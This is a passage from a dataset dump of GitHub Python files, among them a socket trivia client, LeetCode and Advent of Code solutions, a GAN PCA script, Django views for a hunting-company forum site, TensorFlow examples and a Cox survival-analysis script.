\" + e)\r\n\r\n    elif cmd == chatlib.PROTOCOL_SERVER[\"noquestion_msg\"]:\r\n        print(\"GAME OVER\")\r\n        logout(conn)\r\n        exit()\r\n\r\n    else:\r\n        error_and_exit(cmd)\r\n\r\n    answer = input(\"Please choose your answer [1-4]:\")\r\n    cmd, data = build_send_recv_parse(conn, chatlib.PROTOCOL_CLIENT[\"sendanswer_msg\"], n + '#' + splited[int(answer)+1])\r\n\r\n    if cmd in (chatlib.PROTOCOL_SERVER[\"correctanswer_msg\"], chatlib.PROTOCOL_SERVER[\"wronganswer_msg\"]):\r\n        if cmd == chatlib.PROTOCOL_SERVER[\"correctanswer_msg\"]:\r\n            print(\"YES!!!!\")\r\n        else:\r\n            print(\"Nope, correct answer is #\" + data)\r\n    else:\r\n        error_and_exit(cmd)\r\n\r\ndef get_logged_users(conn):\r\n    cmd, data = build_send_recv_parse(conn, chatlib.PROTOCOL_CLIENT[\"logged\"])\r\n    if cmd == chatlib.PROTOCOL_SERVER[\"loggedanswer_msg\"]:\r\n        return data\r\n    else:\r\n        error_and_exit(cmd)\r\n\r\n\r\ndef login(conn):\r\n\r\n    conn.connect((SERVER_IP, SERVER_PORT))\r\n    msg = ''\r\n\r\n    while 'LOGIN_OK' not in msg:\r\n        username = input(\"Please enter username: \\n\")\r\n        password = input(\"Please enter the password: \\n\")\r\n        msg = build_send_recv_parse(conn, chatlib.PROTOCOL_CLIENT[\"login_msg\"], (username+\"#\"+password))\r\n\r\n        if 'LOGIN_OK' not in msg:\r\n            try:\r\n                print(' '.join(msg))\r\n            except:\r\n                print(msg)\r\n    print(\"Logged in!\")\r\n\r\n\r\ndef logout(conn):\r\n\r\n    build_and_send_message(conn, chatlib.PROTOCOL_CLIENT[\"logout_msg\"])\r\n    print(\"Goodbye!\")\r\n    conn.close()\r\n\r\ndef main():\r\n    msg = ''\r\n    conn = connect()\r\n\r\n    login(conn)\r\n\r\n    while msg != 'q':\r\n        msg = input('p Play a trivia question\\n'\r\n                    's Get my score \\n'\r\n                    'h Get high score\\n'\r\n                    'l Get logged users\\n'\r\n                    'q Quit\\n'\r\n                    'Please enter your choice:')\r\n\r\n        if msg == 's':\r\n            print(get_score(conn))\r\n\r\n        elif msg == 'h':\r\n            print(get_highscore(conn))\r\n\r\n        elif msg == 'p':\r\n            play_question(conn)\r\n\r\n        elif msg == 'l':\r\n            print(get_logged_users(conn))\r\n\r\n\r\n    logout(conn)\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n","repo_name":"AriPilotCode/Trivia_game-","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"410441023","text":"class Solution:\n    def restoreString(self, s: str, indices: list[int]) -> str:\n\n        new_s = [''] * len(s)\n\n        for i, ind in enumerate(indices):\n            new_s[ind] = s[i]\n\n        return ''.join(new_s)\n\n\nif __name__ == '__main__':\n    s = \"codeleet\"\n    indices = [4, 5, 6, 7, 0, 2, 1, 3]\n    print(Solution().restoreString(s, indices))\n","repo_name":"glebmikha/algorithms-leetcode-python-scha-poreshaem","sub_path":"episode49-2021-06-17/q1528-shuffle-string.py","file_name":"q1528-shuffle-string.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"}
+{"seq_id":"35113757106","text":"import models.tbgan as tbgan\nimport os\nimport time\nimport numpy as np\nimport tensorflow as tf\nimport menpo.io as mio\nfrom sklearn.decomposition import PCA\n\nfrom config import tbgan_snapshot_name, clip_templates, args\nfrom utils import load_pkl, save_pkl, create_result_subdir, close_session\n\n\ndef create_pca_components(run_id, snapshot=None, grid_size=[1, 1], minibatch_size=8, num_samples=1000, n_components=10):\n    # Set random seed\n    seed = np.random.choice(range(1000))\n    random_state = np.random.RandomState(seed)\n\n    # Load model\n    tbgan_model = tbgan.load_model(tbgan_snapshot_name)\n\n    
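# The tensor names below are specific to this TB-GAN snapshot's graph;\n    # \"Gs/128x128/Conv1/PixelNorm/mul:0\" is the intermediate activation that PCA\n    # is applied to (a GANSpace-style choice) -- picking a layer at a different\n    # resolution would change which semantic directions the components capture.\n    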
# Choose layers\n latents_in = \"Gs/latents_in:0\"\n labels_in = \"Gs/labels_in:0\"\n inter_layer = \"Gs/128x128/Conv1/PixelNorm/mul:0\"\n\n # Create random z and exp\n all_latents = random_state.randn(np.prod(grid_size)*num_samples, *tbgan_model.input_shape[1:]).astype(np.float32) \n all_labels = np.zeros([all_latents.shape[0], 7], np.float32)\n\n all_inter_latent = []\n\n for png_idx in range(int(num_samples/minibatch_size)):\n start = time.time()\n print('Generating samples %d-%d / %d... in ' % (png_idx*minibatch_size, (png_idx+1)*minibatch_size, num_samples), end='')\n latents = all_latents[png_idx*minibatch_size : (png_idx+1)*minibatch_size]\n labels = all_labels[png_idx*minibatch_size : (png_idx+1)*minibatch_size]\n\n sess = tf.get_default_session()\n inter_latent = sess.run(inter_layer, feed_dict={latents_in: latents, labels_in: labels})\n print(inter_latent.shape)\n print(len(inter_latent))\n all_inter_latent.extend(inter_latent) # concatenate two lists \n print('%0.2f seconds' % (time.time() - start))\n\n # PCA\n start = time.time()\n print('Calculating PCA... in ', end='') \n \n all_inter_latent = np.array(all_inter_latent)\n flat_inter_latent = all_inter_latent.reshape(all_inter_latent.shape[0], -1) # this line depends on layer we choose. if we choose layer with shape (n, 128, 128), we need to flatten it to (n, 128*128) in order to apply PCA\n pca = PCA(n_components=n_components)\n pca.fit(flat_inter_latent)\n pca_comps = pca.components_\n\n print('%0.2f seconds' % (time.time() - start))\n\n save_pkl(pca_comps, f\"./results/32/pca_comps_{num_samples}_{n_components}\")\n\n close_session()\n\n return pca_comps\n\ndef apply_pca_to_random_meshes(run_id, snapshot=None, grid_size=[1, 1], minibatch_size=8, num_pngs=8, result_dir='./results', desc='apply_pca_to_random_meshes'):\n # Set random seed\n seed = np.random.choice(range(1000))\n random_state = np.random.RandomState(seed)\n\n # Load model\n tbgan_model = tbgan.load_model(tbgan_snapshot_name)\n\n print(tbgan_model.print_layers())\n\n latents_in = \"Gs/latents_in:0\"\n labels_in = \"Gs/labels_in:0\"\n images_out = \"Gs/images_out:0\"\n inter_layer = \"Gs/128x128/Conv1/PixelNorm/mul:0\"\n\n result_subdir = create_result_subdir(result_dir, desc)\n lsfm_tcoords = mio.import_pickle('models/snapshots/512_UV_dict.pkl')['tcoords']\n lsfm_params = []\n\n pca_comps = load_pkl(\"./results/32/pca_comps_300_10\")\n alphas = [300, 500, 1000] # alpha: manipulation strength\n\n original_result_subdir = f\"{result_subdir}/original_results\"\n os.makedirs(original_result_subdir)\n\n for comp_num in range(len(pca_comps)):\n for alpha in alphas:\n PCA_result_subdir = f\"{result_subdir}/PCA_results/comp_{str(comp_num)}/alpha_{str(alpha)}\"\n os.makedirs(PCA_result_subdir)\n\n\n for png_idx in range(int(num_pngs/minibatch_size)):\n print('Generating latent vectors...')\n latents = random_state.randn(np.prod(grid_size)*minibatch_size, *tbgan_model.input_shape[1:]).astype(np.float32)\n labels = np.zeros([latents.shape[0], 7], np.float32)\n\n sess = tf.get_default_session()\n # writer = tf.summary.FileWriter('./graphs', graph=sess.graph)\n\n images, inter_latent = sess.run([images_out, inter_layer], feed_dict={latents_in: latents, labels_in: labels})\n\n print(np.array(images).shape, np.array(inter_latent).shape)\n \n # export_results(images, original_result_subdir, png_idx, minibatch_size)\n\n # Flatten intermediate latent vectors\n inter_latent = np.array(inter_latent)\n flat_inter_latent = inter_latent.reshape(inter_latent.shape[0], -1) # this line 
depends on layer we choose. if we choose layer with shape (n, 128, 128), we need to flatten it to (n, 128*128) in order to apply PCA]\n\n # Manipulated images via PCA\n for comp_num in range(len(pca_comps)):\n print(f\"PCA Components: {comp_num}/{len(pca_comps)}\")\n for alpha in alphas:\n PCA_result_subdir = f\"{result_subdir}/PCA_results/comp_{str(comp_num)}/alpha_{str(alpha)}\"\n\n flat_inter_latent_manipulated = flat_inter_latent + alpha*pca_comps[comp_num, :]\n inter_latent_manipulated = flat_inter_latent_manipulated.reshape(inter_latent.shape) # invert to original shape\n\n sess = tf.get_default_session()\n # !!!! the part in feed_dict (latents_in: latents, labels_in: labels) is not necessary, we can set all to zero. (this part needs to be feeded because the graph which used in training needs it but don't use it in testing)\n images = sess.run(images_out, feed_dict={inter_layer: inter_latent_manipulated, latents_in: latents, labels_in: labels})\n\n # export_results(images, PCA_result_subdir, png_idx, minibatch_size)\n\n mio.export_pickle(lsfm_params, os.path.join(result_subdir, 'lsfm_params.pkl'))\n open(os.path.join(result_subdir, '_done.txt'), 'wt').close()\n\n close_session()\n\n return latents","repo_name":"catlab-team/latent3D_code","sub_path":"pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":5702,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"37"} +{"seq_id":"26259813165","text":"# import our helpers\r\nfrom types import SimpleNamespace\r\nfrom utils import load, show, day, TRACE, Map, Path, USING_EXAMPLE\r\nimport visualizations as viz\r\nimport numpy as np\r\n\r\n####### GLOBALS #########\r\n\r\n# load todays input data as a docstring\r\nTEXT = load(day(__file__)).splitlines()\r\n# convenient for passing working between parts 1 and 2, and relevant stuff to vizualations \r\nNS = SimpleNamespace()\r\n\r\n# parse the input\r\ndef parse(line):\r\n x,y,z = line.split(\",\")\r\n # convert to int and push them in a bit to allow a border\r\n return int(z)+1, int(y)+1, int(x)+1\r\n\r\nPARSED = [parse(_) for _ in TEXT]\r\nSZ = max(_[0] for _ in PARSED)+2\r\nSY = max(_[1] for _ in PARSED)+2\r\nSX = max(_[2] for _ in PARSED)+2\r\n\r\nNEIGHBOURS = np.array(\r\n [[[0, 0, 0],\r\n [0, 1, 0],\r\n [0, 0, 0]],\r\n\r\n [[0, 1, 0],\r\n [1, 1, 1],\r\n [0, 1, 0]],\r\n\r\n [[0, 0, 0],\r\n [0, 1, 0],\r\n [0, 0, 0]]], dtype=\"uint8\")\r\nNOT_NEIGHBOURS = np.count_nonzero(NEIGHBOURS==0)\r\nnp.set_printoptions(threshold=np.inf)\r\nARRAY = np.zeros((SZ,SY,SX), dtype=\"uint8\") # 3D Array\r\nfor z,y,x in PARSED:\r\n ARRAY[z,y,x]=1\r\n\r\nINSIDE = 0\r\nROCK = 1\r\nOUTSIDE = 2\r\n\r\n# add a border on all axes to mark outside space\r\nARRAY[0,:,:] = OUTSIDE\r\nARRAY[:,0,:] = OUTSIDE\r\nARRAY[:,:,0] = OUTSIDE\r\nARRAY[SZ-1,:,:] = OUTSIDE\r\nARRAY[:,SY-1,:] = OUTSIDE\r\nARRAY[:,:,SX-1] = OUTSIDE\r\n\r\n# repeat until all outside dents are joined\r\nfor z in range(1,SZ):\r\n for y in range(1,SY):\r\n for x in range(1,SX):\r\n for z,y,x in ((z,y,x),(SZ-z,SY-y,SX-x)):\r\n if ARRAY[z,y,x] == INSIDE:\r\n # if any of it's neighbours are outside it must be outside too\r\n chk = ARRAY[z-1:z+2,y-1:y+2,x-1:x+2] * NEIGHBOURS\r\n if np.count_nonzero(chk==OUTSIDE):\r\n ARRAY[z,y,x] = OUTSIDE\r\n\r\n######## Part 1 ##########\r\ndef p1(expect=64 if USING_EXAMPLE else 3564):\r\n tot=0\r\n for z in range(SZ):\r\n for y in range(SY):\r\n for x in range(SX):\r\n if ARRAY[z,y,x]==ROCK:\r\n chk = ARRAY[z-1:z+2,y-1:y+2,x-1:x+2] * NEIGHBOURS\r\n tot += 
np.count_nonzero(chk!=ROCK) - NOT_NEIGHBOURS\r\n return tot\r\n\r\n######## Part 2 ##########\r\n\r\ndef p2(expect=58 if USING_EXAMPLE else 2106):\r\n # fill in air pockets\r\n for z in range(SZ):\r\n for y in range(SY):\r\n for x in range(SX):\r\n if ARRAY[z,y,x]==INSIDE:\r\n ARRAY[z,y,x]=ROCK\r\n # get the new surface area\r\n return p1()\r\n\r\nif __name__ == \"__main__\":\r\n show(p1, p2)\r\n #viz.viz?(NS)\r\n","repo_name":"chrislast/AoC22","sub_path":"day18.py","file_name":"day18.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38873266295","text":"#!/usr/bin/env python3\n\n'''\nCreated on 12/01/2015\n\n@author: dedson\n'''\n\nimport sqlalchemy\nimport sqlalchemy.orm\n\nfrom sqlalchemy import Column, Integer, String, DateTime, Boolean, ForeignKey\nfrom sqlalchemy.engine import reflection\nfrom sqlalchemy.orm import relationship, backref\nfrom sqlalchemy.orm.collections import InstrumentedList, InstrumentedDict, InstrumentedSet\n\nfrom .Base import Base\n\nfrom .Type import Type\n\nfrom jsonweb.encode import to_object\nfrom jsonweb.decode import from_object\n\n@from_object()\n@to_object(suppress=['clasz'])\nclass Returns(Type):\n '''\n The Returns class defines a return structure for a class method.\n '''\n\n __tablename__ = 'returns'\n id = Column(Integer, ForeignKey('type.id'), primary_key=True)\n method_id = Column(Integer, ForeignKey('method.id'))\n\n __mapper_args__ = {\n 'polymorphic_identity':'returns'\n }\n\n def __init__(\n self,\n id=None,\n inherited='returns',\n generic=None,\n clasz_id=None,\n clasz=None\n ):\n super(Returns,self).__init__(\n id=id,\n inherited=inherited,\n generic=generic,\n clasz_id=clasz_id,\n clasz=clasz\n )\n return\n \n def __dir__(self):\n return Type.__dir__(self) + [\n ]\n\n","repo_name":"eddo888/ClassyData","sub_path":"Classes/Returns.py","file_name":"Returns.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18294588600","text":"from django.shortcuts import render, redirect\nfrom .forms import Search, Back, Add_Forum_Theme, Commeent, Registration, Back_not, FormRedactor\nfrom .models import Photo, Ask, Otchets, URL_Video, Forum_Topic, Comment, UserInfo\nfrom django.contrib.auth.models import User\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nimport datetime\nfrom django.http import HttpResponse\nfrom django.core.mail import send_mail, BadHeaderError\nfrom django.core.exceptions import ObjectDoesNotExist\nimport random\nS = []\nS.extend(range(48,58))\nS.extend(range(65, 91))\nS.extend(range(97,123))\nls = [chr(i) for i in S]\ndef home(request):\n search = Search()\n list_theme={'1':\"Продажа товара\", '2': \"Сотрудничество\", '3':\"Охота и лесное хозяйство\", '4':'Прочее'}\n que = Back() if not request.user.is_authenticated else Back_not()\n lis = list(Otchets.objects.order_by(\"-date\", \"name\").all())[:3]\n phs = []\n for i in lis:\n phs.append([i, list(Photo.objects.filter(otchet=i, is_video=False))[0].dir_way])\n if request.method == 'POST':\n ret = Back(request.POST) if not request.user.is_authenticated else Back_not(request.POST)\n if ret.is_valid():\n theme = list_theme[ret.cleaned_data['theme']]\n email = request.user.email if request.user.is_authenticated else ret.cleaned_data['email']\n user = request.user.username if request.user.is_authenticated else ret.cleaned_data['name']\n quetion = 
ret.cleaned_data['quetion']\n            Ask.objects.create(name=theme, user=user, email=email, quetion=quetion, date=datetime.datetime.now())\n            que = None\n    return render(request,\"home.html\", context={\"form_search\":search,\"form_q\":que,\"lis\":phs})\n\ndef faq(request):\n    search = Search()\n    list_theme = {'1': \"Продажа товара\", '2': \"Сотрудничество\", '3': \"Охота и лесное хозяйство\", '4':'Прочее'}\n    que = Back() if not request.user.is_authenticated else Back_not()\n    if request.method == 'POST':\n        ret = Back(request.POST) if not request.user.is_authenticated else Back_not(request.POST)\n        if ret.is_valid():\n            theme = list_theme[ret.cleaned_data['theme']]\n            email = request.user.email if request.user.is_authenticated else ret.cleaned_data['email']\n            user = request.user.username if request.user.is_authenticated else ret.cleaned_data['name']\n            quetion = ret.cleaned_data['quetion']\n            Ask.objects.create(name=theme, user=user, email=email, quetion=quetion, date=datetime.datetime.now())\n            que = None\n    return render(request, \"FAQ.html\", context={\"form_search\": search,\"form_q\":que})\n\ndef forum(request,theme=None,text=None):\n    search = Search()\n    list_theme = {\"1\": \"Продукция охоты – предложения, качество, объёмы, цены\",\n                  \"2\": \"Охота, охотничьи путешествия, трофеи\",\n                  \"3\": \"Способы и орудия охоты\",\n                  \"4\": \"Актуальные правовые и организационно-экономические проблемы охотничьего хозяйства\",\n                  \"5\": \"Иркутский охотфак – поиск и общение сокурсников, выпускников, педагогов\"}\n    topic = Forum_Topic.objects.order_by(\"-start_data\").all()\n    if request.method == 'POST':\n        search = Search(request.POST)\n        if search.is_valid():\n            search = search.cleaned_data[\"text\"]\n            return redirect(f\"/forum/search/{search}\")\n    if text:\n        slist = Forum_Topic.objects.order_by(\"-start_data\").all()\n        topic = []\n        for i in slist:\n            if i.title.lower().find(text[:-2].lower()) != -1 \\\n                    or i.text.lower().find(text[:-2].lower()) != -1\\\n                    or i.theme.lower().find(text[:-2].lower()) != -1:\n                topic.append(i)\n        search['text'].initial = text\n        return render(request, \"forum.html\", context={\"form_search\": search, \"topics\": topic, \"themes\": list_theme})\n    if theme in list_theme.keys():\n        topic = Forum_Topic.objects.filter(theme=list_theme[theme]).all()\n        return render(request, \"forum.html\", context={\"form_search\": search,\"theme\":theme, \"topics\": topic,\n                                                      \"themes\": list_theme})\n    elif not theme:\n        return render(request, \"forum.html\", context={\"form_search\": search, \"topics\": topic, \"themes\": list_theme})\n    else:\n        return redirect(f\"/forum\")\n\ndef contacts(request):\n    search = Search()\n    return render(request, \"contacts.html\", context={\"form_search\": search})\n\ndef photo(request):\n    search = Search()\n    lis = list(Otchets.objects.order_by(\"-date\",\"name\").all())\n    phs=[]\n    for i in lis:\n        phs.append([i,list(Photo.objects.filter(otchet=i,is_video=False))[0].dir_way])\n    phs.extend([[None] for i in range(5-len(phs)%5)])\n    print(phs)\n    phs_s = []\n    for i in range(0, len(phs), 5):\n        phs_s.append(phs[i:i + 5])\n    return render(request, \"Photo_Video.html\", context={\"form_search\": search, \"columns\": phs_s})\n\ndef otchet(request, name):\n    search = Search()\n    phs = list(Photo.objects.filter(otchet=Otchets.objects.get(id=name)))\n    urlvideos = list(URL_Video.objects.filter(otchet=Otchets.objects.get(id=name)))\n    photos = []\n    videos = []\n    for i in phs:\n        if i.is_video:\n            videos.append(i.dir_way)\n        else:\n            photos.append(i.dir_way)\n    return render(request, \"otchets.html\", 
context={\"form_search\": search, \"photos\": photos, \"videos\": videos,\n \"title\":Otchets.objects.get(id=name).name, \"text\":Otchets.objects.get(id=name).text,\n \"urlvideos\":urlvideos})\n\ndef products(request):\n search = Search()\n return render(request, \"products.html\", context={\"form_search\": search})\n\ndef add_forum_theme(request,stheme=1):\n if not request.user.is_authenticated:\n return redirect('/forum')\n add = Add_Forum_Theme()\n add.fields['theme'].initial = stheme\n search = Search()\n if request.method == 'POST':\n add = Add_Forum_Theme(request.POST)\n list_theme = {\"1\": \"Продукция охоты – предложения, качество, объёмы, цены\",\n \"2\": \"Охота, охотничьи путешествия, трофеи\",\n \"3\": \"Способы и орудия охоты\",\n \"4\": \"Актуальные правовые и организационно-экономические проблемы охотничьего хозяйства\",\n \"5\": \"Иркутский охотфак – поиск и общение сокурсников, выпускников, педагогов\"}\n if add.is_valid():\n theme = list_theme[add.cleaned_data['theme']]\n title = add.cleaned_data['title']\n user = request.user\n ava = request.user.userinfo.ava\n quetion = add.cleaned_data['quetion']\n new_id = Forum_Topic.objects.create(title=title, user=user, theme=theme,\n start_data=datetime.datetime.now(), text=quetion, ava=ava).id\n return redirect(f\"/forum/{new_id}\")\n return render(request, \"add_forum_theme.html\", context={\"form\": add, \"form_search\": search})\ndef topic(request, id):\n topic = Forum_Topic.objects.get(id=id)\n search = Search()\n list_theme = {\"Продукция охоты – предложения, качество, объёмы, цены\": \"1\",\n \"Охота, охотничьи путешествия, трофеи\": \"2\",\n \"Способы и орудия охоты\": \"3\",\n \"Актуальные правовые и организационно-экономические проблемы охотничьего хозяйства\": \"4\",\n \"Иркутский охотфак – поиск и общение сокурсников, выпускников, педагогов\": \"5\"}\n if request.user.is_authenticated:\n com = Commeent()\n if request.method == 'POST':\n com = Commeent(request.POST)\n if com.is_valid():\n text = com.cleaned_data['text']\n parent = com.cleaned_data['parent']\n name = request.user\n ava = request.user.userinfo.ava\n new_id = Comment.objects.create(topic=topic, data=datetime.datetime.now(), text=text,\n quetion=parent if parent>0 else None, user=name, ava=ava).id\n return redirect(f\"/forum/{id}#{new_id}\")\n comments = list(Comment.objects.filter(topic=topic))\n for i,el in enumerate(comments):\n if el.quetion:\n comments[i]=[el,Comment.objects.get(id=el.quetion)]\n else:\n comments[i] = [el]\n else:\n com = 'Необходима авторизация на сайте'\n comments = list(Comment.objects.filter(topic=topic))\n for i, el in enumerate(comments):\n if el.quetion:\n comments[i] = [el, Comment.objects.get(id=el.quetion)]\n else:\n comments[i] = [el]\n return render(request, \"topic.html\", context={\"topic\": topic, \"form_search\": search, \"form_comment\": com, \\\n \"comments\":comments, \"theme\": list_theme[topic.theme]})\n\ndef registration(request):\n if request.user.is_authenticated:\n return redirect('/')\n form_r = Registration()\n if request.method == \"POST\":\n form_r = Registration(request.POST)\n if form_r.is_valid():\n global ls\n aut = ''.join(random.sample(ls,20))\n login = form_r.cleaned_data[\"username\"]\n email = form_r.cleaned_data['email']\n password = form_r.cleaned_data['password1']\n send_mail(\"Подтверждение регистрации\",\n f'Для подтверждения регистрации на сайте компании OOO \"Байкал-Фурс\" перейдите по ссылке: \\n'\n f'https://muscus.herokuapp.com/activateuser/{aut}',\n \"baikalfurs@yandex.ru\",\n 
[f\"{email}\"])\n r = User.objects.create_user(email=email, username=login, password=password, is_staff=False, is_superuser=False,\n is_active=False, last_name= aut)\n UserInfo.objects.create(user_id=r.id)\n return render(request, \"registration.html\", context={\"form_r\": None})\n return render(request, \"registration.html\", context={\"form_r\":form_r})\n\ndef active(request, pas):\n try:\n w = User.objects.get(last_name=pas)\n w.last_name = ''\n w.is_active = True\n w.save()\n return HttpResponse(\"Регистрация успешно завершена
 <br><a href='/'>На главную</a>\")\n    except ObjectDoesNotExist:\n        return redirect(\"/\")\ndef profile(request, username):\n    head = User.objects.get(username=username)\n    sex = {None: \"Не выбрано\", True: \"М\", False: \"Ж\"}[head.userinfo.sex]\n    return render(request, \"profile.html\", context={'head':head, 'sex':sex})\n\ndef userredactor(request, user):\n    form = FormRedactor()\n    head = User.objects.get(username=user)\n    if head.id == request.user.id:\n        if request.method == \"POST\":\n            form = FormRedactor(request.POST, request.FILES)\n            if form.is_valid():\n                for k, v in form.cleaned_data.items():\n                    if v not in [None, '']:\n                        setattr(head.userinfo, k, v)\n                head.userinfo.save()\n                return redirect(f'/user/{user}')\n        return render(request, \"profile-form.html\", context={\"form\": form})\n    else:\n        return redirect('/')\n\ndef remove_comment(request, id):\n    com = Comment.objects.get(id=id)\n    for i in Comment.objects.filter(quetion=id):\n        i.quetion = None\n        i.save()\n    s = Forum_Topic.objects.get(title=com.topic).id\n    com.delete()\n    return redirect(f'/forum/{s}')","repo_name":"EVOgeek618/BaikalFurs","sub_path":"firsttry/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"5361762688","text":"\"\"\"\ntag: tree; depth-first search; breadth-first search\n515. Find Largest Value in Each Tree Row\nhttps://leetcode.cn/problems/find-largest-value-in-each-tree-row/\n\"\"\"\n\n\n# # Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, val=0, left=None, right=None):\n#         self.val = val\n#         self.left = left\n#         self.right = right\n\n\nfrom collections import deque\n\n\nclass Solution1:\n    \"\"\" BFS \"\"\"\n    def largestValues(self, root: Optional[TreeNode]) -> List[int]:\n        if not root:\n            return []\n\n        res = []\n        queue = deque()\n        queue.append(root)\n        while queue:\n            level_size = len(queue)\n            level_res = []\n            for _ in range(level_size):\n                node = queue.popleft()\n                level_res.append(node.val)\n                if node.left:\n                    queue.append(node.left)\n                if node.right:\n                    queue.append(node.right)\n            res.append(max(level_res))\n        return res\n\n\nclass Solution2:\n    \"\"\" DFS \"\"\"\n    def largestValues(self, root: Optional[TreeNode]) -> List[int]:\n        def dfs(node, depth):\n            if not node:\n                return\n            if len(res) == depth:\n                res.append(node.val)\n            else:\n                res[depth] = max(res[depth], node.val)\n            dfs(node.left, depth + 1)\n            dfs(node.right, depth + 1)\n        res = []\n        dfs(root, 0)\n        return res\n","repo_name":"ZhangRui111/AwesomeAlgorithm","sub_path":"leetcode/medium/515.py","file_name":"515.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"20945537939","text":"import tensorflow as tf\n\n# Duas constantes\na = tf.constant(2)\nb = tf.constant(3)\n\n# Iniciando o grafo \nwith tf.Session() as sess:\n    print(\"a=2, b=3\")\n    print(\"Adição: %i\" % sess.run(a+b))\n    
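# each sess.run(op) call executes just the subgraph needed to produce op (TF1-style sessions)\n    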
print(\"Multiplicação: %i\" % sess.run(a*b))\n\n# Uso de Placeholders e tipos de dados\na = tf.placeholder(tf.int16)\nb = tf.placeholder(tf.int16)\n\n# Definindo as operações usando add() e mul()\nadd = tf.add(a, b)\nmul = tf.mul(a, b)\n\n# Iniciando o grafo \nwith tf.Session() as sess:\n # Passando os valores na hora da chamada!\n print(\"Adição com variáveis: %i\" % sess.run(add, feed_dict={a: 2, b: 3}))\n print(\"Multi com variáveis: %i\" % sess.run(mul, feed_dict={a: 2, b: 3}))\n\n\n# Agora com matrizes!\nmatrix1 = tf.constant([[3., 3.]])\nmatrix2 = tf.constant([[2.],[2.]])\n\n# Definindo a operação usando o matmul()\nproduct = tf.matmul(matrix1, matrix2)\n\n#Rodando e obtendo o resultado\nwith tf.Session() as sess:\n result = sess.run(product)\n print(result) # Resultado deve ser algo como [[ 12.]]\n","repo_name":"pichiliani/ExemplosPalestraTensorFlow","sub_path":"TFSomaMultiplica.py","file_name":"TFSomaMultiplica.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"7896490602","text":"import metrics, prepare_data\r\nimport numpy as np\r\nfrom table import draw_plot\r\nfrom sksurv.linear_model import CoxPHSurvivalAnalysis\r\nimport matplotlib.pyplot as plt\r\n\r\ndef surv_plot():\r\n X_test_sel = X_test[0:10, :]\r\n surv_funcs = cox_ph.predict_survival_function(X_test_sel)\r\n\r\n i = 0\r\n for fn in surv_funcs:\r\n plt.step(fn.x, fn(fn.x), where=\"post\", label=str(i))\r\n i += 1\r\n plt.ylabel(\"Survival probability\")\r\n\r\n plt.xlabel(\"Time in days\")\r\n plt.legend()\r\n plt.xlim(0, 3000)\r\n plt.ylim(0, 1)\r\n plt.grid(True)\r\n plt.savefig('files/COX PH Surv.png')\r\n plt.show()\r\n\r\n# Data\r\nX_train, y_train, X_test, y_test = prepare_data.get_train_test()\r\n\r\n# COX PH with Best Params.\r\nrandom_state = 64\r\n# Approved\r\n# Old:: best_params = {'alpha': 10, 'n_iter': 50, 'ties': 'efron', 'tol': 1e-09}\r\nbest_params = {'alpha': 0, 'n_iter': 50, 'ties': 'efron', 'tol': 1e-09}\r\n\r\ncox_ph = CoxPHSurvivalAnalysis(alpha=10, ties=\"efron\", n_iter=50, tol=1e-9)\r\n\r\n# 5 Years Analysis\r\ntimes = np.arange(365, 1826, 30)\r\ncox_ph.fit(X_train, y_train)\r\n\r\n((train_plot, train_acc_auc), (test_plot, test_acc_auc)) = metrics.c_auc_score(cox_ph, X_train, y_train, X_test, y_test, times)\r\ntrain_acc_bs, test_acc_bs = metrics.i_brier_score(cox_ph, X_train, y_train, X_test, y_test, times)\r\ntrain_acc_icpw, test_acc_icpw = metrics.c_index_icpw(cox_ph, X_train, y_train, X_test, y_test)\r\ntrain_acc_cindex, test_acc_cindex = metrics.c_index_censored(cox_ph, X_train, y_train, X_test, y_test)\r\n\r\n# Plot of Metrics\r\ndraw_plot(['Train', train_acc_cindex, train_acc_icpw, train_acc_auc, train_acc_bs],\r\n ['Test', test_acc_cindex, test_acc_icpw, test_acc_auc, test_acc_bs],\r\n 'COXPH model')\r\n\r\nwith open('files/coxph.npy', 'wb') as f:\r\n np.save(f, train_plot)\r\n np.save(f, test_plot)\r\n\r\nsurv_plot()","repo_name":"k1rezaei/Survival-Analysis","sub_path":"dataset_and_other_models/coxph.py","file_name":"coxph.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23815151862","text":"# # Load Data Set\nimport pandas as pd\ndf = pd.read_csv('dataset.csv')\n\n\n# # Save DataSet into Data Structure\nX = []\ny = []\nfor (name,mcg,gvh,lip,chg,acc,alm1,alm2,label) in zip(df['sequence_name'],df['mcg'],df['gvh'],df['lip'],df['chg'],df['aac'],df['alm1'],df['alm2'],df['label']):\n 
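# each row yields a seven-value numeric feature vector plus its class label\n    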
